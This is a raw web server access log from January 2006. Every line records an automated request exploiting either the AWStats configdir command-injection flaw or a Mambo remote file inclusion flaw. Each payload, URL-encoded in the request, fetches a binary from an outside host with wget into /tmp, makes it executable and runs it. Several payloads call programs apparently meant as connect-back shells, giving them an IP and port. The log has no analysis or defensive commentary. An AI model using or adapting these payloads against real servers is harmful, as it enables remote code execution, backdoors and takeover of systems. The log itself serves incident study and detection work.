209.206.228.15 - - [15/Jan/2006:06:09:27 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

69.56.211.202 - - [15/Jan/2006:07:19:32 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

69.56.211.202 - - [15/Jan/2006:07:19:33 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

69.56.211.202 - - [15/Jan/2006:07:19:34 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

218.49.183.193 - - [15/Jan/2006:09:31:01 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bchmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;echo|  HTTP/1.1" 404 278

218.49.183.193 - - [15/Jan/2006:09:31:02 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bchmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;echo|  HTTP/1.1" 404 278

218.49.183.193 - - [15/Jan/2006:09:31:04 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bchmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;echo|  HTTP/1.1" 404 286

82.124.239.127 - - [15/Jan/2006:12:26:25 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

82.124.239.127 - - [15/Jan/2006:12:26:26 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

82.124.239.127 - - [15/Jan/2006:12:26:27 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

82.165.238.34 - - [16/Jan/2006:00:25:03 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

82.165.238.34 - - [16/Jan/2006:00:25:04 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

82.165.238.34 - - [16/Jan/2006:00:25:05 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

67.158.29.194 - - [16/Jan/2006:02:12:55 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

67.158.29.194 - - [16/Jan/2006:02:12:56 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

67.158.29.194 - - [16/Jan/2006:02:12:57 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

200.27.221.5 - - [16/Jan/2006:20:53:45 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

200.27.221.5 - - [16/Jan/2006:20:53:46 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

200.27.221.5 - - [16/Jan/2006:20:53:48 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

200.27.221.5 - - [16/Jan/2006:20:53:49 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 270

200.27.221.5 - - [16/Jan/2006:20:53:51 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 269

200.27.221.5 - - [16/Jan/2006:20:53:52 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 276

200.27.221.5 - - [16/Jan/2006:20:53:53 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 274

200.27.221.5 - - [16/Jan/2006:20:53:55 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 280

193.19.219.217 - - [17/Jan/2006:03:57:27 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 404 278

213.225.65.133 - - [18/Jan/2006:02:56:04 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20213%2e225%2e65%2e133%2fcback%3bchmod%20%2bx%20cback%3b%2e%2fcback%20213%2e225%2e65%2e133%2053;echo%20YYY;echo|  HTTP/1.1" 404 278

213.225.65.133 - - [18/Jan/2006:02:56:06 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20213%2e225%2e65%2e133%2fcback%3bchmod%20%2bx%20cback%3b%2e%2fcback%20213%2e225%2e65%2e133%2053;echo%20YYY;echo|  HTTP/1.1" 404 278

213.225.65.133 - - [18/Jan/2006:02:56:07 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20213%2e225%2e65%2e133%2fcback%3bchmod%20%2bx%20cback%3b%2e%2fcback%20213%2e225%2e65%2e133%2053;echo%20YYY;echo|  HTTP/1.1" 404 286

204.83.56.144 - - [18/Jan/2006:12:46:18 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 278

204.83.56.144 - - [18/Jan/2006:12:46:19 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 278

204.83.56.144 - - [18/Jan/2006:12:46:21 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 286

195.28.196.79 - - [18/Jan/2006:20:16:25 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.28.196.79 - - [18/Jan/2006:20:16:26 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.28.196.79 - - [18/Jan/2006:20:16:28 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

69.13.36.242 - - [18/Jan/2006:23:23:47 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 278

69.13.36.242 - - [18/Jan/2006:23:23:49 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 278

69.13.36.242 - - [18/Jan/2006:23:23:50 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 286

67.18.147.22 - - [19/Jan/2006:01:50:21 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 270

67.18.147.22 - - [19/Jan/2006:01:50:22 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 269

67.18.147.22 - - [19/Jan/2006:01:50:23 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 276

67.18.147.22 - - [19/Jan/2006:01:50:25 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 274

61.19.38.130 - - [19/Jan/2006:03:30:07 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

61.19.38.130 - - [19/Jan/2006:03:30:09 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

61.19.38.130 - - [19/Jan/2006:03:30:10 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

218.232.109.223 - - [19/Jan/2006:09:08:18 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

218.232.109.223 - - [19/Jan/2006:09:08:23 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

218.232.109.223 - - [19/Jan/2006:09:08:24 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

67.18.147.22 - - [19/Jan/2006:09:20:34 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 270

67.18.147.22 - - [19/Jan/2006:09:20:35 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 269

67.18.147.22 - - [19/Jan/2006:09:20:36 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 276

67.18.147.22 - - [19/Jan/2006:09:20:37 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 274

163.30.76.4 - - [20/Jan/2006:07:28:47 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

163.30.76.4 - - [20/Jan/2006:07:28:48 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

163.30.76.4 - - [20/Jan/2006:07:28:49 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

211.131.218.107 - - [20/Jan/2006:10:50:12 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

211.131.218.107 - - [20/Jan/2006:10:50:13 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

211.131.218.107 - - [20/Jan/2006:10:50:14 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

213.221.136.26 - - [21/Jan/2006:00:14:16 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

213.221.136.26 - - [21/Jan/2006:00:14:18 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

213.221.136.26 - - [21/Jan/2006:00:14:20 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 286

82.127.23.55 - - [21/Jan/2006:15:23:50 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

82.127.23.55 - - [21/Jan/2006:15:23:52 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

82.127.23.55 - - [21/Jan/2006:15:23:54 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

80.124.149.170 - - [22/Jan/2006:15:03:23 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

80.124.149.170 - - [22/Jan/2006:15:03:24 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

80.124.149.170 - - [22/Jan/2006:15:03:25 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

66.221.25.1 - - [22/Jan/2006:16:27:48 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

66.221.25.1 - - [22/Jan/2006:16:27:49 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

66.221.25.1 - - [22/Jan/2006:16:27:51 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

81.56.225.221 - - [23/Jan/2006:15:06:56 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

81.56.225.221 - - [23/Jan/2006:15:06:57 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

81.56.225.221 - - [23/Jan/2006:15:06:58 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

62.212.120.109 - - [24/Jan/2006:17:16:20 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

62.212.120.109 - - [24/Jan/2006:17:16:25 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

62.212.120.109 - - [24/Jan/2006:17:16:27 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

209.250.116.251 - - [24/Jan/2006:22:36:42 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 270

209.250.116.251 - - [24/Jan/2006:22:36:43 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 269

209.250.116.251 - - [24/Jan/2006:22:36:44 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 276

209.250.116.251 - - [24/Jan/2006:22:36:46 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo|  HTTP/1.1" 404 274

168.243.8.32 - - [25/Jan/2006:04:48:29 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

168.243.8.32 - - [25/Jan/2006:04:48:30 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

168.243.8.32 - - [25/Jan/2006:04:48:31 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

61.178.21.180 - - [26/Jan/2006:02:19:41 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

61.178.21.180 - - [26/Jan/2006:02:19:42 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

61.178.21.180 - - [26/Jan/2006:02:19:43 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

218.232.109.223 - - [28/Jan/2006:09:22:06 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

218.232.109.223 - - [28/Jan/2006:09:22:07 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

218.232.109.223 - - [28/Jan/2006:09:22:08 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

220.175.8.18 - - [28/Jan/2006:12:17:33 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

220.175.8.18 - - [28/Jan/2006:12:17:34 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 278

80.55.222.242 - - [30/Jan/2006:01:29:13 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

